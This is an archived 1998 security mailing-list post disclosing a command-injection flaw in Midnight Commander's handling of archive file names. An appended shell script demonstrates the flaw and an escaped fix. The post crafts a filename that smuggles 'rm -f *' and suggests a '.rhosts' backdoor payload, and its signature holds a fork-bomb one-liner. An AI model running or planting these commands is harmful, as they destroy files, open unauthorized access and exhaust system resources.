MC shell scripts

Michał Zalewski (lcamtuf@POLBOX.COM)
Sat, 17 Jan 1998 22:14:45 +0100

I discovered a problem with Midnight Commander's method of decompressing
archives, which allows execution of hidden commands. An evil file may be
prepared this way:

$ gzip foo
$ mv foo.gz "quake2-test-unknown-linux-'\`rm -f *\`'-elf-i386-generic-beta.gz"

Now, this filename, when displayed by user-friendly programs (www or
ftp browsers, file managers), will be cropped to fit in a window :)
Under my mc (vidmode 11) it's displayed as:

quake2-test-unknown-linu~-i386-generic-beta.gz (or .tgz, your choice :)

When I'm viewing or editing a .gz archive (F3/F4/ENTER) - Midnight Commander
calls gzip from a shell script created in /tmp:

gzip -dc 'filename' 2>/dev/null

That may be dangerous. In the above case, this script is equal to:

gzip -dc 'quake2-test-unknown-linux--elf-i386-generic-beta.gz' 2>/dev/null
rm -f *

'rm -f *' may be replaced with 'echo + +>.rhosts',
'touch WHOS_THE_WINNER' etc ;)

Of course, it isn't a serious problem for experienced users, but
what's with the non-experienced ones (80%) ;-)

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
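
The quoting flaw described in the message above, next to an escaped form, as an added example that is not part of the original post and is not Midnight Commander's code. The function names, the MARKER file and the sample name are constructed for illustration, and the `--` in the escaped line is an extra precaution assumed here.

```shell
#!/bin/sh
# Added example: script line built as the post describes, next to an escaped one.

# Script line as in the post: name wrapped in '...' with no escaping.
naive_line() {
    printf "gzip -dc '%s' 2>/dev/null\n" "$1"
}

# Escape $1 for use inside a single-quoted shell word (each ' becomes '\'').
# The result is left in $sq_out, so trailing newlines in a name survive.
sq_escape() {
    sq_rest=$1 sq_out=
    while :; do
        case $sq_rest in
            *\'*) sq_out=$sq_out${sq_rest%%\'*}"'\\''"
                  sq_rest=${sq_rest#*\'} ;;
            *)    sq_out=$sq_out$sq_rest; break ;;
        esac
    done
}

# Same line with the name escaped first; "--" keeps a leading "-" from
# being read as an option.
safe_line() {
    sq_escape "$1"
    printf "gzip -dc -- '%s' 2>/dev/null\n" "$sq_out"
}

# Run LINE with sh in an empty scratch directory. Succeeds if a file named
# MARKER appeared there, i.e. part of the file name ran as a command.
name_was_executed() {
    nw_dir=$(mktemp -d) || return 2
    ( cd "$nw_dir" && sh -c "$1" ) >/dev/null 2>&1
    nw_rc=1
    [ -e "$nw_dir/MARKER" ] && nw_rc=0
    rm -rf "$nw_dir"
    return $nw_rc
}

# Constructed sample name in the post's pattern, carrying a harmless command.
SAMPLE="demo-'\`touch MARKER\`'-beta.gz"

for line in "$(naive_line "$SAMPLE")" "$(safe_line "$SAMPLE")"; do
    if name_was_executed "$line"; then verdict="name executed as a command"
    else verdict="name treated as data"; fi
    printf '%s\n  -> %s\n' "$line" "$verdict"
done
```

Passing the file name to gzip as an argument (or through an environment variable) instead of pasting it into script text removes the need for escaping altogether.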